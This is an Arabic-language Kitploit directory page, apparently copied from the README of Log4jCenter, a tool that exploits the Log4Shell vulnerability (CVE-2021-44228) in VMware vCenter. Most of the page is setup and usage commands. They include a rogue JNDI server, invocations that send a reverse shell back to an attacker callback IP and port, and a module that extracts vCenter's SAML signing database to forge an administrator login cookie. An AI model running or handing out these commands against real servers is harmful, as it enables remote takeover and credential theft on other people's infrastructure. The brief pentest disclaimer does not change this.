Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4jCenter — استغلال CVE-2021-44228 في vCenter لتنفيذ الأوامر عن بُعد والمزيد. | Kitploit
أدوات/GitHubGitHub/puzzlepeaches/log4jcenter
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتاختبار الاختراقالقيادة والسيطرة
GitHubpuzzlepeaches/log4jcenter

Log4jCenter

استغلال CVE-2021-44228 في vCenter لتنفيذ الأوامر عن بُعد والمزيد.

عرض المستودع
10519منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4jCenter

استغلال CVE-2021-44228 في vCenter لتنفيذ الأوامر عن بُعد والمزيد. مقالة المدونة التي تشرح الاستغلال موضحة أدناه:

  • كيفية استغلال ثغرات Log4j في VMWare vCenter

لماذا؟

إثباتات المفهوم لهذه الثغرة متناثرة ويجب تنفيذها يدويًا. يقوم هذا المستودع بأتمتة عملية الاستغلال ويعرض مسار هجوم إضافي ممكن بعد الاستغلال.

التثبيت

يمكن استخدام هذا المستودع يدويًا أو مع Docker.

التثبيت اليدوي

لتنزيل وتشغيل الأداة يدويًا، اتبع الخطوات التالية. أولاً، تأكد من تثبيت Java و Maven على جهاز المهاجم. لفعل ذلك باستخدام apt على أنظمة التشغيل المبنية على Debian، قم بتشغيل الأمر التالي:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

قم باستنساخ مستودع GitHub وتثبيت جميع متطلبات Python:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && pip3 install -r requirements.txt

من جذر مستودع Log4jCenter، قم بتجميع مشروع Rogue-Jndi باستخدام الأمر أدناه:

root@kitploit:~
mvn package -f utils/rogue-jndi/

تثبيت Docker

أولاً، تأكد من تثبيت Docker على جهاز المهاجم الخاص بك. (لن أرشدك خلال فعل ذلك)

بعد ذلك، قم بتنفيذ الأمر التالي لاستنساخ المستودع وبناء صورة Docker التي سنستخدمها.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && docker build -t log4jcenter .

لتشغيل الحاوية، قم بتشغيل أمر مشابه للتالي مع إضافة علامات سطر الأوامر الخاصة بك. على سبيل المثال، سيتم استخدام الأمر أدناه لاستغلال vCenter والحصول على شل عكسي. لاحظ أن الحاوية لن تلتقط الشل العكسي. تحتاج إلى إنشاء مستمع ncat في جلسة شل منفصلة:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 8090:8090 -p 1389:1389 log4jcenter \ 
    -t 10.100.100.1 -i 192.168.1.1 -p 4444 -r

الاستخدام

root@kitploit:~
usage: exploit.py [-h] -t IP -i CALLBACK [-p PORT] [-e] [-r]

optional arguments:
  -h, --help            show this help message and exit
  -t IP, --target IP    vCenter Host IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -e, --exfiltrate      Module to pull SAML DB
  -r, --revshell        Module to establish reverse shell

أمثلة

الحصول على شل عكسي باستخدام الأداة المثبتة على نظامك المحلي:

root@kitploit:~
python3 exploit.py -t vcenter.acme.com -i 10.10.10.1 -p 4444 -r

استخراج قواعد بيانات توقيع SAML من داخل حاوية Docker:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 1389:1389 -p 8090:8090 log4jcenter \
    -t 10.100.100.1 -i 192.168.1.1 -e

ملاحظات

  • لسبب غير معروف، قد لا يتم تشغيل حمولة الشل العكسي بعد التشغيل الأول للبرنامج النصي. قد تضطر إلى تشغيل الأداة عدة مرات للحصول على الاستدعاء. سأستكشف هذا وأدرج إصلاحًا في إصدار مستقبلي.
  • يوجد في دليل utils مستودع vcenter_saml_login. يمكنك استخدامه مع علامة e لاستخراج قاعدة بيانات توقيع SAML الخاصة بـ vCenter وإنشاء ملف تعريف ارتباط دخول إداري لـ vSphere. ستحتاج إلى تثبيت المتطلبات بشكل منفصل.
  • للمدافعين، يمكنك التخفيف من هذه المشكلة باستخدام تصحيح قادم قريبًا أو الحل البديل المفصل هنا

إخلاء مسؤولية

هذه الأداة مصممة للاستخدام أثناء اختبار الاختراق؛ استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يتحملون مسؤولية أي إساءة استخدام لهذا البرنامج.

تنزيل الأداة